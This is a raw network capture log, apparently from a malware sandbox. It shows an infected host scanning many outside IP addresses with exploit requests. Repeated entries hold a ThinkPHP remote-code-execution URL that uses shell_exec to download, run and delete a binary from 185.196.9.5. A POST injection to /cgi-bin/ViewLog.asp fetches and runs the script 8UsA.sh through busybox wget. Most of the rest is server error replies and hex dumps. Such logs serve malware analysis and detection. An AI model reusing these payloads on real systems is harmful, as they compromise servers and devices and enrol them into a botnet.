Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.38 (Debian) Server at web.opto-copy.de Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
191	192.168.2.15	59818	95.213.252.94	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:57.447520018 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:02:57.648444891 CET	619	IN	HTTP/1.1 401 Authorization Required Date: Sun, 25 Feb 2024 18:02:56 GMT Server: Apache/2.2.22 WWW-Authenticate: Basic realm="choose yourself" Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 290 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Raw: 1f 8b 08 00 00 00 00 00 00 03 75 90 31 4f c3 30 10 85 77 ff 8a a3 0b 20 95 b8 45 8c 56 24 68 83 a8 54 a0 42 61 60 74 e3 a3 b1 94 da e1 7c 26 0a bf 1e 3b ed c0 c2 78 7a ef 7b f7 ee d4 c5 fa 75 55 7f ec 2a 78 aa 9f b7 b0 7b 7f d8 6e 56 30 bb 91 72 53 d5 8f 52 ae eb f5 49 b9 2d 16 52 56 2f b3 52 a8 96 8f 5d a9 5a d4 26 0d 6c b9 c3 f2 6e b1 84 fb c8 ad 27 fb a3 d9 7a 07 6f f8 15 2d a1 51 f2 e4 10 4a 4e 84 da 7b 33 e6 90 65 f9 1f 90 24 a1 fa b2 6e 6d 80 80 f4 8d 04 8d 8f 9d 01 e7 19 d2 64 3f 47 e0 56 33 8c 3e 0a 4d 08 fa 1c 84 06 d8 83 6e 1a 0c 21 39 10 8c 6f e2 11 1d 0b 4a e1 18 18 4d 01 50 d9 24 51 86 21 c4 be ef 6c c6 92 79 20 ef 0e a2 49 15 12 61 75 17 e0 0a 8b 43 31 87 bd 36 d0 eb 10 06 4f e6 7a 0e 7e 62 49 ec c9 0f a9 5e 5a 82 c1 5d 32 44 67 90 02 6b 67 a0 f5 43 6e 32 c5 8f 22 87 ff 8d a5 f3 a5 85 92 7d fe cb f4 91 74 76 7e ab f8 05 6c dd f9 a2 91 01 00 00 Data Ascii: u1O0w EV$hTBa`t\|&;xz{uU*x{nV0rSRI-RV/R]Z&ln'zo-QJN{3e$nmd?GV3>Mn!9oJMP$Q!ly IauC16Oz~bI^Z]2DgkgCn2"}tv~l

Session ID	Source IP	Source Port	Destination IP	Destination Port
192	192.168.2.15	48256	95.183.36.188	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:57.496988058 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:02:57.732872963 CET	315	IN	HTTP/1.1 400 Bad Request Server: openresty Date: Sun, 25 Feb 2024 18:02:57 GMT Content-Type: text/html Content-Length: 154 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
193	192.168.2.15	40312	95.131.233.7	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:57.621467113 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:02:58.758270025 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:02:58.968688011 CET	502	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Sun, 25 Feb 2024 18:02:58 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
194	192.168.2.15	47584	62.29.9.228	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:57.627924919 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:02:58.854187965 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:00.294245005 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:03.398119926 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:09.286076069 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:20.806140900 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:45.125982046 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:32.229461908 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
195	192.168.2.15	49646	94.123.97.24	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:57.850001097 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
196	192.168.2.15	49226	31.200.116.59	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:57.850447893 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
197	192.168.2.15	49772	112.213.98.172	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:57.959013939 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:02:58.279205084 CET	307	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sun, 25 Feb 2024 18:02:58 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
198	192.168.2.15	47120	95.209.133.80	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:57.975095034 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:02:58.223026037 CET	62	IN	HTTP/1.0 400 Bad Request Connection: Keep-Alive
Feb 25, 2024 19:02:58.223040104 CET	112	IN	Data Raw: 4b 65 65 70 2d 41 6c 69 76 65 3a 20 74 69 6d 65 6f 75 74 3d 32 30 0d 0a 58 2d 46 72 61 6d 65 2d 4f 70 74 69 6f 6e 73 3a 20 53 41 4d 45 4f 52 49 47 49 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 0d 0a 3c 68 Data Ascii: Keep-Alive: timeout=20X-Frame-Options: SAMEORIGINContent-Type: text/html<h1>Bad Request</h1>

Session ID	Source IP	Source Port	Destination IP	Destination Port
199	192.168.2.15	35766	112.48.180.191	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:58.029078960 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:02:58.419913054 CET	521	IN	HTTP/1.1 400 Bad Request Server: Byte-nginx Date: Sun, 25 Feb 2024 18:02:58 GMT Content-Type: text/html Content-Length: 230 Connection: close via: cache04.fjxmcm05 x-request-ip: 89.149.18.20 x-tt-trace-tag: id=5 x-response-cinfo: 89.149.18.20 x-response-cache: miss Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 2f 3e 50 6f 77 65 72 65 64 20 62 79 20 42 79 74 65 2d 6e 67 69 6e 78 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 74 65 6e 67 69 6e 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr/>Powered by Byte-nginx<hr><center>tengine</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
200	192.168.2.15	43974	31.136.222.98	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:58.037225008 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:02:58.630182028 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:02:59.782155991 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:02.118268013 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:06.726150990 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:15.942118883 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:34.885899067 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:11.749646902 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
201	192.168.2.15	56212	95.100.231.150	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:58.051285982 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:02:58.338634968 CET	480	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Sun, 25 Feb 2024 18:02:58 GMT Date: Sun, 25 Feb 2024 18:02:58 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 34 39 37 65 31 39 62 38 26 23 34 36 3b 31 37 30 38 38 38 34 31 37 38 26 23 34 36 3b 35 64 61 32 63 37 36 35 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.497e19b8.1708884178.5da2c765</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
202	192.168.2.15	59828	94.121.77.110	8080

Timestamp	Bytes transferred	Direction	Data
